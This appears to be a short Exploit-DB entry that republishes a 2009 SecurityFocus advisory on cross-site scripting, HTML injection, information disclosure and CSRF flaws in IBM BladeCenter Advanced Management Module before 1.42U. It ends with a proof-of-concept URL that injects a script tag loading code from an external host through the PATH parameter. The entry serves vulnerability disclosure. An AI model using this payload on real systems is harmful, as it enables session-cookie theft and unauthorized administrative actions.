IBM Bladecenter Advanced Management Module 1.42 - '/private/file_Management.ssi?PATH' Cross-Site Scripting

EDB-ID:

32895




Platform:

Multiple

Date:

2009-04-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/34447/info
 
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
 
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
 
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
 
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. 

http://example.com/private/file_management.ssi?PATH=/etc"><script%20src="http://www.example.com"></script>